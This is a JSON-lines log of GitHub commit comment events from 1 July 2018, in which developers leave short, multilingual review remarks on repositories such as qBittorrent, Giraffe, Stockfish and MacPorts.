{"id":"7903311653","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":29558642,"position":null,"line":null,"path":null,"commit_id":"336f1398c7040f39ae057338978a739ffe8a5a60","created_at":"2018-07-01T16:38:06Z","updated_at":"2018-07-01T16:38:06Z","author_association":"MEMBER","body":"Ah I missed the 16.04 in the title - well, I can put a workaround back in for that I guess, but don't want to continue to support old versions (not enough manpower, so I'm happy for people just to use a newer ubuntu)."}},"created_at":"2018-07-01T16:38:06Z"}
{"id":"7903311934","type":"CommitCommentEvent","actor":{"login":"sagiegurari"},"repo":{"name":"vtavernier/efiboot-rs"},"payload":{"comment":{"id":29558644,"position":39,"line":39,"path":".travis.yml","commit_id":"7ce6d591c1c5896d7ffba5c56d4fa696a19fea13","created_at":"2018-07-01T16:38:19Z","updated_at":"2018-07-01T16:38:19Z","author_association":"NONE","body":"instead of manually installing kcov and setting up those packages in travis, just do sudo: true and cargo-make will manage that for you automatically."}},"created_at":"2018-07-01T16:38:19Z"}
{"id":"7903313998","type":"CommitCommentEvent","actor":{"login":"Virtueplace"},"repo":{"name":"Virtueplace/QuizApp"},"payload":{"comment":{"id":29558648,"position":8,"line":8,"path":"README.md","commit_id":"c2c357992e2c816f068ba8664b8d88fd2189bc3f","created_at":"2018-07-01T16:40:06Z","updated_at":"2018-07-01T16:40:06Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1ZfdH0GrPNjF1ZxfB-VmJNqv060MT0Pox\r\n#app location on gdrive"}},"created_at":"2018-07-01T16:40:06Z"}
{"id":"7903314254","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558649,"position":2,"line":2,"path":"NET.S.2018.Nekliukov.03/MathsExtension.Test/OperationsTest.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:40:17Z","updated_at":"2018-07-01T16:40:17Z","author_association":"NONE","body":"-  нужно бы переходить на NUnit"}},"created_at":"2018-07-01T16:40:17Z"}
{"id":"7903314470","type":"CommitCommentEvent","actor":{"login":"analiarevolero"},"repo":{"name":"paredesvmg/proyIs2"},"payload":{"comment":{"id":29558650,"position":null,"line":null,"path":null,"commit_id":"2e200b90699fcabd01a4ecf3b1361efb484e3ac5","created_at":"2018-07-01T16:40:29Z","updated_at":"2018-07-01T16:40:29Z","author_association":"COLLABORATOR","body":"Version anterior bd"}},"created_at":"2018-07-01T16:40:29Z"}
{"id":"7903314530","type":"CommitCommentEvent","actor":{"login":"anak10thn"},"repo":{"name":"BiznetGIO/gundala"},"payload":{"comment":{"id":29558651,"position":null,"line":null,"path":null,"commit_id":"5137862881be715255e13ae892ed23a3349dbaf7","created_at":"2018-07-01T16:40:32Z","updated_at":"2018-07-01T16:40:32Z","author_association":"CONTRIBUTOR","body":"#2 "}},"created_at":"2018-07-01T16:40:32Z"}
{"id":"7903314543","type":"CommitCommentEvent","actor":{"login":"Virtueplace"},"repo":{"name":"Virtueplace/QuizApp"},"payload":{"comment":{"id":29558652,"position":null,"line":null,"path":null,"commit_id":"c2c357992e2c816f068ba8664b8d88fd2189bc3f","created_at":"2018-07-01T16:40:32Z","updated_at":"2018-07-01T16:40:32Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1ZfdH0GrPNjF1ZxfB-VmJNqv060MT0Pox\r\n#app location on gdrive"}},"created_at":"2018-07-01T16:40:32Z"}
{"id":"7903314970","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558653,"position":21,"line":21,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:40:54Z","updated_at":"2018-07-01T16:40:54Z","author_association":"NONE","body":"- Что не так будет, если degree = 1?"}},"created_at":"2018-07-01T16:40:54Z"}
{"id":"7903315582","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558656,"position":26,"line":26,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:41:20Z","updated_at":"2018-07-01T16:41:20Z","author_association":"NONE","body":"-  if (precision <= 0 || precision >= 1)"}},"created_at":"2018-07-01T16:41:20Z"}
{"id":"7903316529","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558659,"position":23,"line":23,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:42:05Z","updated_at":"2018-07-01T16:42:05Z","author_association":"NONE","body":"- Не стоит экономить на сообщениях здесь ArgumentException();"}},"created_at":"2018-07-01T16:42:05Z"}
{"id":"7903316724","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558660,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:42:13Z","updated_at":"2018-07-01T16:42:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:42:13Z"}
{"id":"7903317070","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558662,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:42:30Z","updated_at":"2018-07-01T16:42:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:42:30Z"}
{"id":"7903317081","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558663,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:42:30Z","updated_at":"2018-07-01T16:42:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:42:30Z"}
{"id":"7903317087","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558664,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:42:31Z","updated_at":"2018-07-01T16:42:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:42:31Z"}
{"id":"7903317265","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558665,"position":null,"line":null,"path":null,"commit_id":"216ca25677b844bfef78cd190239d230988154d2","created_at":"2018-07-01T16:42:39Z","updated_at":"2018-07-01T16:42:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:42:39Z"}
{"id":"7903317655","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558666,"position":36,"line":36,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:42:56Z","updated_at":"2018-07-01T16:42:56Z","author_association":"NONE","body":"- и на именах переменных, имеющих смысл - res"}},"created_at":"2018-07-01T16:42:56Z"}
{"id":"7903318115","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"z64/discordcr"},"payload":{"comment":{"id":29558667,"position":null,"line":null,"path":null,"commit_id":"80e10b3bc20f6997bf7cb3cec72114bebd610777","created_at":"2018-07-01T16:43:16Z","updated_at":"2018-07-01T16:43:16Z","author_association":"OWNER","body":"https://gist.github.com/z64/7dd467bdbd7ef5466795070200546dad"}},"created_at":"2018-07-01T16:43:16Z"}
{"id":"7903318431","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558669,"position":41,"line":41,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T16:43:27Z","updated_at":"2018-07-01T16:43:27Z","author_association":"NONE","body":"- это черновой коментарий, перед комитом такие надо убирать"}},"created_at":"2018-07-01T16:43:27Z"}
{"id":"7903319897","type":"CommitCommentEvent","actor":{"login":"4BDULMU33D"},"repo":{"name":"4BDULMU33D/Abdul"},"payload":{"comment":{"id":29558671,"position":null,"line":null,"path":null,"commit_id":"2e7b7349753f726a8338dcf9e62c0bde77646a61","created_at":"2018-07-01T16:44:26Z","updated_at":"2018-07-01T16:44:26Z","author_association":"OWNER","body":"A copy of the ALC Android basic 7days challenge project (A Simple Quiz App)"}},"created_at":"2018-07-01T16:44:26Z"}
{"id":"7903320516","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558672,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:44:52Z","updated_at":"2018-07-01T16:44:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:44:52Z"}
{"id":"7903320848","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29558674,"position":null,"line":null,"path":null,"commit_id":"bbde53774abe7f2f588cda83241abcf771835498","created_at":"2018-07-01T16:45:08Z","updated_at":"2018-07-01T16:45:08Z","author_association":"CONTRIBUTOR","body":"Possibly a canditate for strict rules to forbid LSB on constants. 🙄 "}},"created_at":"2018-07-01T16:45:08Z"}
{"id":"7903321126","type":"CommitCommentEvent","actor":{"login":"qervot"},"repo":{"name":"qervot/mark-my-word"},"payload":{"comment":{"id":29558678,"position":18,"line":46,"path":"app/src/main/java/me/geeksploit/markmyword/model/WordModel.java","commit_id":"e9a83b8e70d2e73c17cdf731338f2a56a534bf25","created_at":"2018-07-01T16:45:19Z","updated_at":"2018-07-01T16:45:19Z","author_association":"OWNER","body":"да он получил доступ сказал пока не добрался до компа\r\n"}},"created_at":"2018-07-01T16:45:19Z"}
{"id":"7903323365","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558680,"position":null,"line":null,"path":null,"commit_id":"1af4fbda93970a2558aa355559593097e5d71c1a","created_at":"2018-07-01T16:47:00Z","updated_at":"2018-07-01T16:47:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:47:00Z"}
{"id":"7903324682","type":"CommitCommentEvent","actor":{"login":"yvan-burrie"},"repo":{"name":"yvan-burrie/Genie-Reverse"},"payload":{"comment":{"id":29558683,"position":316,"line":316,"path":"src/Engine/ClipInfo.cpp","commit_id":"450de24b3831266a999f1690b6258f56356019e1","created_at":"2018-07-01T16:48:01Z","updated_at":"2018-07-01T16:48:01Z","author_association":"OWNER","body":"Sure, it's all C++11, so I only use `NULL` in C and `nullptr` in CPP. I made all follow C++11 because it's convenient having the default class members initialized in constructors."}},"created_at":"2018-07-01T16:48:01Z"}
{"id":"7903325533","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29558684,"position":15,"line":63,"path":"src/base/utils/foreignapps.cpp","commit_id":"7d19435897da9bce85dcd7a16f97fd88e72b5964","created_at":"2018-07-01T16:48:39Z","updated_at":"2018-07-01T16:48:39Z","author_association":"MEMBER","body":"Is regex correct? `.` means \"any character\". Or it hasn't this meaning inside brackets?"}},"created_at":"2018-07-01T16:48:39Z"}
{"id":"7903326769","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558686,"position":null,"line":null,"path":null,"commit_id":"1af4fbda93970a2558aa355559593097e5d71c1a","created_at":"2018-07-01T16:49:37Z","updated_at":"2018-07-01T16:49:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Интерфейс: сделать менеджер для интерфейса, перенести туда обработку селекта для звёзд.](https://trello.com/c/GBSLRVPX/18-%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D1%84%D0%B5%D0%B9%D1%81-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D0%BC%D0%B5%D0%BD%D0%B5%D0%B4%D0%B6%D0%B5%D1%80-%D0%B4%D0%BB%D1%8F-%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D1%84%D0%B5%D0%B9%D1%81%D0%B0-%D0%BF%D0%B5%D1%80%D0%B5%D0%BD%D0%B5%D1%81%D1%82%D0%B8-%D1%82%D1%83%D0%B4%D0%B0-%D0%BE%D0%B1%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BA%D1%83-%D1%81%D0%B5%D0%BB%D0%B5%D0%BA%D1%82%D0%B0-%D0%B4%D0%BB%D1%8F-%D0%B7%D0%B2%D1%91%D0%B7%D0%B4)"}},"created_at":"2018-07-01T16:49:37Z"}
{"id":"7903328397","type":"CommitCommentEvent","actor":{"login":"andmcadams"},"repo":{"name":"andmcadams/doomsdaypractice"},"payload":{"comment":{"id":29558688,"position":null,"line":null,"path":null,"commit_id":"0e1956d486964b4bd6484b7ae419e32a571a24bf","created_at":"2018-07-01T16:50:49Z","updated_at":"2018-07-01T16:50:49Z","author_association":"OWNER","body":"Note that JS modulo does not return the least positive residue in the case of integer x < 0 with modulus m > 0. For example, x % m with x = -1 and m = 5 would normally return 4, the least positive residue, but JS will return the least residue with the same sign as x, which is -1 in this case."}},"created_at":"2018-07-01T16:50:49Z"}
{"id":"7903330118","type":"CommitCommentEvent","actor":{"login":"DevonFulcher"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29558690,"position":13,"line":1339,"path":"src/main/java/edu/southwestern/evolution/genotypes/TWEANNGenotype.java","commit_id":"575c005acb6ccb3d87d1fddb41b9e4761f0813a2","created_at":"2018-07-01T16:52:08Z","updated_at":"2018-07-01T16:52:08Z","author_association":"COLLABORATOR","body":"@schrum2 initialNumberOfSubstratePairs == allSubstrateConnectivity.size(). Are you saying that I should just get rid of this if statement?"}},"created_at":"2018-07-01T16:52:08Z"}
{"id":"7903331959","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"shihan9/text"},"payload":{"comment":{"id":29558693,"position":4,"line":339,"path":"test/data/test_field.py","commit_id":"179d7622efa1f3640afec7857e5e20cd3f8ed7e9","created_at":"2018-07-01T16:53:35Z","updated_at":"2018-07-01T16:53:35Z","author_association":"NONE","body":"tensor_type FloatTensor"}},"created_at":"2018-07-01T16:53:35Z"}
{"id":"7903333176","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"shihan9/text"},"payload":{"comment":{"id":29558696,"position":15,"line":112,"path":"torchtext/data/field.py","commit_id":"179d7622efa1f3640afec7857e5e20cd3f8ed7e9","created_at":"2018-07-01T16:54:34Z","updated_at":"2018-07-01T16:54:34Z","author_association":"NONE","body":"types"}},"created_at":"2018-07-01T16:54:34Z"}
{"id":"7903335072","type":"CommitCommentEvent","actor":{"login":"NinoFloris"},"repo":{"name":"NinoFloris/Giraffe"},"payload":{"comment":{"id":29558700,"position":8,"line":201,"path":"src/Giraffe/Core.fs","commit_id":"3fad2c5e5de4a1a445cd56581786d2cb0b263b26","created_at":"2018-07-01T16:56:03Z","updated_at":"2018-07-01T16:56:03Z","author_association":"OWNER","body":"\r\n\r\nI'm really not sure if this was actually helping perf, yes you sometimes can short circuit the pipeline but at the cost of quite some interface calls (IResponseFeature, IFeatureCollection etc) to actually get the answer to ctx.Response.HasStarted and you then add this overhead for every compose.\r\n\r\nAlso correctness doesn't actually suffer as sending after another middleware started wasn't a supported scenario anyway\r\n"}},"created_at":"2018-07-01T16:56:03Z"}
{"id":"7903336776","type":"CommitCommentEvent","actor":{"login":"NinoFloris"},"repo":{"name":"NinoFloris/Giraffe"},"payload":{"comment":{"id":29558702,"position":41,"line":57,"path":"src/Giraffe/Middleware.fs","commit_id":"3fad2c5e5de4a1a445cd56581786d2cb0b263b26","created_at":"2018-07-01T16:57:18Z","updated_at":"2018-07-01T16:57:18Z","author_association":"OWNER","body":"Sadly this is just much faster than starting the whole state machine and a TaskBuilder just to do one continuation. I have tested this for our own middlewares to no end."}},"created_at":"2018-07-01T16:57:18Z"}
{"id":"7903337899","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29558705,"position":15,"line":63,"path":"src/base/utils/foreignapps.cpp","commit_id":"7d19435897da9bce85dcd7a16f97fd88e72b5964","created_at":"2018-07-01T16:58:09Z","updated_at":"2018-07-01T16:58:09Z","author_association":"MEMBER","body":"It matches to `.` character here.\r\nBut I suppose I should add back the escape character to avoid confusion.\r\n"}},"created_at":"2018-07-01T16:58:09Z"}
{"id":"7903338115","type":"CommitCommentEvent","actor":{"login":"CCOSTAN"},"repo":{"name":"CCOSTAN/Home-AssistantConfig"},"payload":{"comment":{"id":29558706,"position":null,"line":null,"path":null,"commit_id":"975c92b80d4b4f29c8e11395617ed07ff67907dd","created_at":"2018-07-01T16:58:18Z","updated_at":"2018-07-01T16:58:18Z","author_association":"OWNER","body":"Thanks!  I think I need to move to a poster board type format! :)"}},"created_at":"2018-07-01T16:58:18Z"}
{"id":"7903338589","type":"CommitCommentEvent","actor":{"login":"4BDULMU33D"},"repo":{"name":"4BDULMU33D/Abdul"},"payload":{"comment":{"id":29558707,"position":null,"line":null,"path":null,"commit_id":"2e7b7349753f726a8338dcf9e62c0bde77646a61","created_at":"2018-07-01T16:58:40Z","updated_at":"2018-07-01T16:58:40Z","author_association":"OWNER","body":"Link to Google Drive(7days Challenge project): https://drive.google.com/open?id=1KIYPWctFCD7nGnNACnvWFnPNi_1wPUiq"}},"created_at":"2018-07-01T16:58:40Z"}
{"id":"7903339269","type":"CommitCommentEvent","actor":{"login":"jhellis3"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29558708,"position":null,"line":null,"path":null,"commit_id":"fc299fee1bdf07e92b732a6693b2c855d0e8a6c5","created_at":"2018-07-01T16:59:12Z","updated_at":"2018-07-01T16:59:12Z","author_association":"NONE","body":"Have not been following this closely, but has a version without the popcount been tried?\r\n\r\nIf not I'd give both if (b) and if (popcount(b) > 1) a try.  "}},"created_at":"2018-07-01T16:59:12Z"}
{"id":"7903340043","type":"CommitCommentEvent","actor":{"login":"NinoFloris"},"repo":{"name":"NinoFloris/Giraffe"},"payload":{"comment":{"id":29558709,"position":8,"line":201,"path":"src/Giraffe/Core.fs","commit_id":"3fad2c5e5de4a1a445cd56581786d2cb0b263b26","created_at":"2018-07-01T16:59:47Z","updated_at":"2018-07-01T16:59:47Z","author_association":"OWNER","body":"Or is this basically to counter the bad task builder perf by trying to do an early out?"}},"created_at":"2018-07-01T16:59:47Z"}
{"id":"7903341763","type":"CommitCommentEvent","actor":{"login":"Ronyx-Nyambuga"},"repo":{"name":"Ronyx-Nyambuga/ronyx.github.io"},"payload":{"comment":{"id":29558719,"position":null,"line":null,"path":null,"commit_id":"f84bfa3f4069332c11afff9ec97a8f71a5882e10","created_at":"2018-07-01T17:00:48Z","updated_at":"2018-07-01T17:00:48Z","author_association":"OWNER","body":"currency converter application"}},"created_at":"2018-07-01T17:00:48Z"}
{"id":"7903342167","type":"CommitCommentEvent","actor":{"login":"aashutoshrathi"},"repo":{"name":"iiitv/algos"},"payload":{"comment":{"id":29558722,"position":5,"line":3,"path":".bin/install_pip3.sh","commit_id":"dd1584e4e5e0b4a7c671135cc05029db915eada5","created_at":"2018-07-01T17:01:05Z","updated_at":"2018-07-01T17:01:05Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-01T17:01:05Z"}
{"id":"7903342331","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29558723,"position":null,"line":null,"path":null,"commit_id":"f564833fda44e715f61fe9c5e34e521a7ddc1882","created_at":"2018-07-01T17:01:11Z","updated_at":"2018-07-01T17:01:11Z","author_association":"MEMBER","body":"> Does that mean I should no longer increment the revision field when I update the SBCL version?\r\n\r\nNo. However, we do not have `revision 0` in Portfiles. If you need to bump the revision number, just add the `revision` back. (That is to say, we never have a line saying `revision 0`, only `revision 1` and above.)"}},"created_at":"2018-07-01T17:01:11Z"}
{"id":"7903342587","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29558724,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-01T17:01:21Z","updated_at":"2018-07-01T17:01:21Z","author_association":"OWNER","body":"@szlin @eclipseo @maxice8 @dmarcoux @imntreal pdd v1.3 is released! Please update your respective channels."}},"created_at":"2018-07-01T17:01:21Z"}
{"id":"7903343216","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29558726,"position":null,"line":null,"path":null,"commit_id":"f564833fda44e715f61fe9c5e34e521a7ddc1882","created_at":"2018-07-01T17:01:49Z","updated_at":"2018-07-01T17:01:49Z","author_association":"MEMBER","body":"> For the record, I think requiring other port maintainers to update such a revision should not be necessary, in that MacPorts should be able to derive such a dependency.\r\n\r\nI also agree it's bad, but there's no code to derive such things yet. Feel free to submit code to do it."}},"created_at":"2018-07-01T17:01:49Z"}
{"id":"7903343982","type":"CommitCommentEvent","actor":{"login":"veronicagw"},"repo":{"name":"veronicagw/Tech-Degree-Projects"},"payload":{"comment":{"id":29558727,"position":null,"line":null,"path":null,"commit_id":"48f24b16311fb6c590269ff833460ec2264c51f3","created_at":"2018-07-01T17:02:22Z","updated_at":"2018-07-01T17:02:22Z","author_association":"OWNER","body":"Made requested changes to remove HTML validation error"}},"created_at":"2018-07-01T17:02:22Z"}
{"id":"7903345035","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29558728,"position":null,"line":null,"path":null,"commit_id":"38faedb45c5a2c1ed28c76fbef773bb164b0587a","created_at":"2018-07-01T17:03:08Z","updated_at":"2018-07-01T17:03:08Z","author_association":"NONE","body":"Could you test this at the 384 core machine available now?"}},"created_at":"2018-07-01T17:03:08Z"}
{"id":"7903345478","type":"CommitCommentEvent","actor":{"login":"aashutoshrathi"},"repo":{"name":"iiitv/algos"},"payload":{"comment":{"id":29558729,"position":4,"line":3,"path":".bin/install_pip3.sh","commit_id":"764e6ae334e2c0a4f6cc6fc73fc50987425dfb4a","created_at":"2018-07-01T17:03:25Z","updated_at":"2018-07-01T17:03:25Z","author_association":"MEMBER","body":"❤️ "}},"created_at":"2018-07-01T17:03:25Z"}
{"id":"7903345495","type":"CommitCommentEvent","actor":{"login":"Marvel34"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29558730,"position":30,"line":30,"path":"Makefile","commit_id":"cc7b7097a5bc1681d0f4c05d5f07576c8b279fc4","created_at":"2018-07-01T17:03:26Z","updated_at":"2018-07-01T17:03:26Z","author_association":"NONE","body":"100"}},"created_at":"2018-07-01T17:03:26Z"}
{"id":"7903345677","type":"CommitCommentEvent","actor":{"login":"joestr"},"repo":{"name":"joestr/ZoneMenu"},"payload":{"comment":{"id":29558731,"position":198,"line":159,"path":"src/main/java/xyz/joestr/zonemenu/ZoneMenu.java","commit_id":"388c183b44dc9a5e56543df4b34947a26cfd77c4","created_at":"2018-07-01T17:03:34Z","updated_at":"2018-07-01T17:03:34Z","author_association":"OWNER","body":"Ist eingebaut worden"}},"created_at":"2018-07-01T17:03:34Z"}
